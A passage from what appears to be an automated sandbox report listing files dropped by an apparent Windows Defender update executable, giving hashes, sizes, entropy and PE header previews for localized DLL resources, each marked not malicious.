Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........p............................................................@.......................................... ..`l...........r... ..............8............................................................................rdata..............................@..@.rsrc....p... ...n..................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ko-KR\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	49896
Entropy (8bit):	4.997917662788999
Encrypted:	false
SSDEEP:	1536:YTd+4qGQG5aZGmh+tg3pAXb4XyU1RHPjO5:YTd+4qGQG5aZGmh+UpA8yU1di5
MD5:	BB70C5EB54F690DFCA728895F25B6601
SHA1:	E4A73B9F8751C66F7E508642BD9F865D3D4A89FB
SHA-256:	38F74BC285D27B860B2A7F8B7DD707876C89D188799AB57A8900857E84141BD5
SHA-512:	B4B11F335F080B6FCF80CD8F36BBAB7B6A5160A54262CF82B530EBDA95F0635B64347366BFCEE536442F2192DE47D6CACEF9540F22E0F02712277A5DBAA42343
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ko-KR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20712
Entropy (8bit):	6.4916941693022885
Encrypted:	false
SSDEEP:	384:7r4QEehiuwTypTIDtBWS8/WCQRDBRJb7VslGsJoc:7r4YTpP8R1Pb3q
MD5:	2C5015292ECC9E51E4A7C5116F0D2F6D
SHA1:	C2ABFB16B63AE750EBF7444551AE5717480E4DFD
SHA-256:	5B3AD7DF4494CDE19C3D80D0064C037F5882A60943165D31D6EB4BF66C3CF34D
SHA-512:	E52FA2CD130934AAB9E028A54DA16EDF9920530FC713A2D254E3BA0A76B536DFBEA23F8B1E924E4052C2A1ECE1A5EBFF28417ECD6F858E291B8DC6CFB32E0D1A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...vKVa...........!.........................................................P............@.......................................... ..4...........0... ...........................................................................................rdata..p...........................@..@.rsrc...4... ...,..................@..@............vKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...%...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\kok-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	5.494640799724161
Encrypted:	false
SSDEEP:	384:7r3UiJBIwZXmCmBXstBsQOMpSosjyQdQde1r9rBnPM9H4UxPWS8/WXRDBRJsIrlV:7rkohtXNfouR1P7
MD5:	DD8EB2310B7CFE70A1637B3554E0BA59
SHA1:	7BE105A6A89F80DFECE5268ABB901A96FA4B4DCD
SHA-256:	4BB817A3216E25BCD96E8C6A1C9DB32B4B2F87696D6279E6BE0968921897EB42
SHA-512:	64C2CD34325F1B3A0378028B7116F364643C29706AEB835F8067ACF6476351774459D0180389F447BE9E10D69CAF7B260E59DBBF4F1A900959BE9C92C59301B4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...tKVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@............tKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..hF...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\lb-LU\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	4.996541919285809
Encrypted:	false
SSDEEP:	768:7rS65A8YqpQLHXSYzKjJaMuFbukR1PV7aJGa:TA8YqpQLHXShjJaMuFbukHPAJGa
MD5:	F550649C08F98B0AEA8E873D7522FF6E
SHA1:	03E386B2A0F922A21AB9FC606B7E0EEF3566CF09
SHA-256:	0D9E8A489A99DA0A85667A30782454F4393E9279400C368463FC421A73BBE50D
SHA-512:	5877CC8FC711D34E2CEC24B4C9AF1C4B79310B5B8812C8E32DAD3B8957C91DF5BD99C7E5B00067371CC0C468B397A0291B56561CEC10E2CA964F402B9EC65C2D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...wKVa...........!.........V............................................................@.......................................... ..HR...........X... ...........................................................................................rdata..p...........................@..@.rsrc...HR... ...T..................@..@............wKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...M...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\lo-LA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26872
Entropy (8bit):	5.830429876216803
Encrypted:	false
SSDEEP:	384:7rStnptPaLbPRKWBr68pMb0mHUrV3yhyhhMhvu+ZGPxqJzmG8x0MWS8/WjWRDBRk:7rQptSLbPRKWBRsAKfZGPxOUE4WR1PtI
MD5:	7CC56F36F54BFD32B24F8269CBC25712
SHA1:	3BDAE77A9366EA79C3FF19B95DC4A093B0BE3AA2
SHA-256:	8C228ECEAB7F6475A48DF767F88F4F1DFD108937C2453FE2D67DA7C184A338B1
SHA-512:	A0094F7A81C3F0768B61C18E72129B9CB2244C00040AC314B8003543CC81084C5EA85E4EDE1431D5F203ABF33F37A220A7DB1A559B6DA8010F8A5D711BFFBA36
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...yKVa...........!.........F...............................................p.......G....@.......................................... ...B...........H... ...........................................................................................rdata..p...........................@..@.rsrc....B... ...D..................@..@............yKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..X=...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\lt-LT\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64744
Entropy (8bit):	4.30989485935788
Encrypted:	false
SSDEEP:	1536:0Xl5a4QO3KGYQeAYzffpeAU2dw7gv7cGFnsW+d6b01Uxth8M4qIfeg9yCGiHP5T:0Xl5a4QO3KGYQeAYzffpeAU2dw7gv7cV
MD5:	27533FBBCE191C502F58AA744C09B849
SHA1:	17D3A51821D7E07A11D1F1AA950C7317F39D13F6
SHA-256:	14C86B9251617ED03F1CBF6BAD494E10D8AE4A421955E922719838A9CDEB9842
SHA-512:	9C39ACFBE9817432ADC47F12C640031E3ED5F8720F18B1A459E3EC0D5F99BBF988BC475E5F0E9CF56D1E6810BF17FDB8AF659AB08B7904437045A438FADCA2B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................,.....@.......................................... ..l................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\lt-LT\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.156925792561631
Encrypted:	false
SSDEEP:	768:7rieOtb4Tyr9xw+vNy3CHCUM0iR1Pty5Ps:GspHPtqPs
MD5:	9026148C819D5C847ACC68BC8E301ED1
SHA1:	5F1FB060374FB91EAB255A7F1425D9E00D6673A5
SHA-256:	B7A3303B8AA2867DF57C5C7B5EBCC204A39165AEA0ADE83A73195E8B12FD3F49
SHA-512:	8837B329FBB17A108BBC24C6176DEF230776A9910322FCB7328F2CEA7C05E28CF4E85CB0C1C890B527D37258A8370E9100EDAD79C7CAA6B8939C0733A6B34F8B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...\|KVa...........!.........L...............................................p......n.....@.......................................... ..$H...........N... ...........................................................................................rdata..p...........................@..@.rsrc...$H... ...J..................@..@............\|KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..hC...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\lv-LV\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64232
Entropy (8bit):	4.374878492651182
Encrypted:	false
SSDEEP:	384:7rYOVhLU5vzNlO5KdpTdQ8+2jspFpiTfuOUj/KJo3TKBQ3x5tE7G7yqgvkIyyyyy:7r3L5KnTzV7fM7g1kA8aWRR1Pc6LF
MD5:	6E39C969E7C1B3504247517C5BF75691
SHA1:	811A42AF8D8BC744DA9CFBF0238835537D64CAB2
SHA-256:	E9A47A06F4609DF0FC502073DB628958F73C7E4C8DA5B93184443791D02B8704
SHA-512:	4DDB48A893DC54FDAA5D6FB569188945B729661B25ED119E4162E999032F62B6A140F678DE923D32BFCC5F28C75CEAA062E9427F331F0680C614D343D4AD76A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\lv-LV\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28408
Entropy (8bit):	5.1962372408808974
Encrypted:	false
SSDEEP:	384:7rBSF5YyHSww1MvDgWS8/W5RDBRJXVl5g:7rIFPVBkR1PO
MD5:	CCB530458FCEE57E22B2EA4D6ED208EE
SHA1:	3D7BCAB121371606959A0D6EAB19BA9A45D42499
SHA-256:	E35D26C5075FC7DA7C0F8B60587E4F1283AF90A93A24552582211DC8DDDA1B01
SHA-512:	19C9EC13469465096FB90076C3DCBD9BCEF6A6DC142E8D8134CB4DA45058500DA9FC45B26FF2D7D1D972D74FDEAD17283C25DEEDE4B87B524EA71F371FC53950
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p.......J....@.......................................... ..HH...........N... ...........................................................................................rdata..p...........................@..@.rsrc...HH... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...C...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mi-NZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	4.933576893109038
Encrypted:	false
SSDEEP:	384:7riXOM9k+Bx8HDJHJUrRKJ89J2YlIR9Y3awJRRJRWJXzJFIRWIRBYMRmaNAJxHTB:7rAk+Bxy06R1Pvy5S
MD5:	ED26BA8C0D72BCC36EDC88C45EE5FFC4
SHA1:	C88FF5856C9693C1832D80188A992276A947BE8E
SHA-256:	8688A71A827466A4040DC4647D08AA769246F391F30705FF1CA257F4F78D575B
SHA-512:	2B4EA3E5443EFA9C61226DA18AC79FBBEB80A7C9C4E831E5F8E1FB085E288F58CB49E6AFBBFFF2B16CB3FB6A140621E0148A7AC84B4008117284948EF6F73E89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........N...............................................p......2N....@.......................................... ...L...........P... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...L..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..XG...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mk-MK\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30440
Entropy (8bit):	5.2976566839210735
Encrypted:	false
SSDEEP:	384:7rTBYhpEowzd8kFufYdRxWS8/WzRDBRJCG6qslGslQR:7r9gErugA+R1PC0N
MD5:	D254D68D9C9B3ADB6F299A2F8E995BB8
SHA1:	66C4EE455403554C99723A0A5F3FE54688507BEA
SHA-256:	2A79835205C8F5F628E88AA1E61F3545AE26EF87CF2FA004A42873952EC4D4E9
SHA-512:	86F9877D868334C82CB2E07BE249616FE28609576750BE27C9FEE062CD6368A3C8C5E234A91C43C15B8D5290ADA4E8B54C54905EC211757F0E089E65D507F342
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........T......................................................CU....@.......................................... ...Q...........V... ...........................................................................................rdata..p...........................@..@.rsrc....Q... ...R..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..XL...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ml-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31992
Entropy (8bit):	5.351865695189437
Encrypted:	false
SSDEEP:	384:7rQN8yjQrs2SFaDe40PlmzNA+CxaEBo8egXqERLjeNUeEbL7eu8ewceB3ewwsx5b:7rQaxXKeu7zC8C32X836R1PI
MD5:	7DB06185F5B8B88066388F4881076566
SHA1:	90196DEE8929842919D3F738A3232353C839C0FC
SHA-256:	E039735F816CCA4FD1D3B1D950D9393986967307FE04C6CFD9CC4FA50C6E2173
SHA-512:	A11535677DC0FD13C20D15B931044EC6A89B05CD89E6DD49012805570174999BEB2FD2FBDA9E712AF3337CD3D1B6AAB1BCA8F74178A0F42A9029B4D69685FF02
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........Z............................................................@.......................................... ...W...........\... ...........................................................................................rdata..p...........................@..@.rsrc....W... ...X..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..8S...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mpextms.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	855616
Entropy (8bit):	6.4385448335086926
Encrypted:	false
SSDEEP:	12288:ZWHXu3ClCZ1hjeTZLoRjGhLYQCXLbRJNMa2eyFs/DZT1BoYi55N5m0Q:ZWHXDM1hyFajGh0QCXLbbtrT/Yz59Q
MD5:	A5448568B24541FCA45C5C97D3EDF0B2
SHA1:	228874C2284D3FEDDDFFB2151A65A54933E2E610
SHA-256:	E257948A6B3416E2110219D3C11721D8E7DC668591F4DF60C8F40CD75C896B3B
SHA-512:	BBD965090F9C3C3F42100D66AC9D2C67BEFB0F60E75FE64F4A15C59D9FF207A2324A21299E05788B7C8AC14FD8893BE25CDAB67BB8EF97A2FC9EF1A20591ADBA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r....................N.......N.......N...r...N....................................Rich....................PE..d....TI..........."..........@.................@.........................................`.......... ......................................t...x............`...c......@>..............p...................h...(...0...8............................................text...r........................... ..`.rdata...X.......`..................@..@.data....K.......0..................@....pdata...c...`...p...@..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mr-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30440
Entropy (8bit):	5.4224957592011
Encrypted:	false
SSDEEP:	384:7rv9WZiws9lzTkrTk2hqvyH3y5dqWS8/W8RDBRJCX7aJdlGslGys:7r+0pR1PE7aJGT
MD5:	194257A1024CC7E39D63397FE1032ECD
SHA1:	17391CE95360BDCB3272452C2493F464AF5CEB12
SHA-256:	9D3248100342AEB6BE4C4EB53BEEF7A2C4ED20E7013BC0B982299EBAA98891AE
SHA-512:	6AF1A59426AA11711DF60AAF613217963227BBAB9CE7AF49ACEF09496D4DA98E1AB182EB411819CBD5B4077D8662241571B242611500A77EC9FC4A9220C6676B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........T............................................................@.......................................... ...Q...........V... ...........................................................................................rdata..p...........................@..@.rsrc....Q... ...R..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..XL...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ms-MY\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.896823456329218
Encrypted:	false
SSDEEP:	384:7rcUMW3R77vHbdcN+eKqzyWS8/WwRDBRJyJccs4lGsQg8:7rl7xezRR1PyJcp5b
MD5:	AD98F9AEB308A129EC66CC9D00D5F89C
SHA1:	3B84487D28B23F21BE463310A74B3290325E49CA
SHA-256:	95D7B51CACDD3D3080E3641A846959092E2868CD5BE7A488FC8524E1A5D870BE
SHA-512:	2FC4A74910AABC195E6232971F6382AA61FBD5FEE289E6187C8599B2C158952C2A53D61A11C0B8A309AE72387BC5C5187844FBB82D035AE716651E2DCED53FD0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........R...............................................p.......]....@.......................................... ...O...........T... ...........................................................................................rdata..p...........................@..@.rsrc....O... ...P..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mt-MT\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30440
Entropy (8bit):	5.0907246492265
Encrypted:	false
SSDEEP:	384:7rdIhbynpT9eGe4LNgsZ+n414KYdlACNqdWKjGxWS8/WERDBRJkEQmDWlGszRn:7rdZ9ZfNR1Pt1zE
MD5:	1909106149F61C1F8858F89AD26DE2A3
SHA1:	DCB5C177087BD7F7F9A20772817E6C7DCD9F6024
SHA-256:	F02B104DA41574ADCE8A1DD333B960E0F49014865E5A38C2F2C726D4BF37894E
SHA-512:	99F20B6C89E29D2F4183076AF6A1A7DAA1D32EB69FF1C058F9CB1666044644E33A0C545C89107F65BEC02433D8461797D32B8EDF72585285ECD29ECEF2B21412
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........T......................................................?.....@.......................................... ..TP...........V... ...........................................................................................rdata..p...........................@..@.rsrc...TP... ...R..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...K...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nb-NO\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62184
Entropy (8bit):	4.184509939542172
Encrypted:	false
SSDEEP:	768:7rdvxeJfZD1HmwbB812S+BBBRBMER1Ps3VXR:1vkJfZD1HmwbB81r+BBBRBMEHPslh
MD5:	049D5EB3CA6C39F7C2B52FB92F833B12
SHA1:	95CDC8180FC98B1D18BD8E777EDC92EA88D9C5ED
SHA-256:	561723B736EA9FA81951FFE37CFBE370000581511C404CD5DB37BA281C0BFDA4
SHA-512:	A223A48875EEB398CC32B60B5888FA1F7FE22400DCF53B823A5A98EF862338766343844B1D1152AC0D07FDB94087F8407D63E81AB1C75DDFED1661DE698BBC5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nb-NO\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	4.437895161601827
Encrypted:	false
SSDEEP:	384:7rG4IwkuXyolHaYrNJzt+n1z2hFf4WXtRDBRJLhl95cAt:7rPJg1z2hFfBtR1PLzcAt
MD5:	E6B1FCA46E8D96A5C21D319484A90D4C
SHA1:	9492AAA23714EF9FD51FD8B5F1045DDE0F36F261
SHA-256:	FF51570F95646D497BBC29C0984DD5230BB98548C1E0A9F671A9FD9979CE8DA7
SHA-512:	1F2698A4B6011979AF3BD5564AA1C159F77C534598FBE0B5A0EC09F024096131A2F9585FD529B3895D56D065E1D67C008EC97D998C2578712C81E795BA70778D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................J....@.......................................... ..D................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nb-NO\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.029411484848942
Encrypted:	false
SSDEEP:	384:7rCmTjzDTjzDTjzMcs8Mcs8Mcs8ytfLy8vhZ+hM4mqPxZelH6JbnB7QLISWS8/W2:7r6fLy8vhZ+hMyvelaTkL2IR1PTy5/
MD5:	304AD32107CE26C67BB900EF0EF3619F
SHA1:	9CA67163A6D8ACA1EBF30EF13F748B7DEA3F5E37
SHA-256:	7ED4B1F7B4029AC1BD5BFF3A524D8505627DE82C29457732BB70ABBB31FAA23B
SHA-512:	EC7291E62C9991D276FC7621F7962D7A14DA4D1198AAFF7D4D4E29175D6CEFA12349A190E5010A0ED09549887FD6A01E816CCD0278CDE9DD11A7C5C7AD9AEA0A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p.......j....@.......................................... ...I...........N... ...........................................................................................rdata..p...........................@..@.rsrc....I... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..`D...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ne-NP\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30456
Entropy (8bit):	5.442850966301067
Encrypted:	false
SSDEEP:	384:7rNapLdK8okCiCNg2gokW+W8F8m3R2yXy9xp/WS8/WURDBRJdl5u:7r8pL7jCStR1PM
MD5:	C4A6FDF1D995631B9C65FFC2AACFA873
SHA1:	2D3431ED1DCED90818E47D2E96FB26225E747B2B
SHA-256:	A8D371CE6D117AB8A9776D968D177AA03AFA2DEB101B77FF030ED8D8777CD8D3
SHA-512:	D9D51CD4191E0192668AC065093D6D96ECE5934B6D55DCA7EAE9C26C8E52A291CC35602F6C29B7E9CB37539362FCECAA1BDE76440588EF0DEC253354ACF95A70
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........T............................................................@.......................................... ..@Q...........V... ...........................................................................................rdata..p...........................@..@.rsrc...@Q... ...R..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\nl-NL\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68328
Entropy (8bit):	4.150164164182951
Encrypted:	false
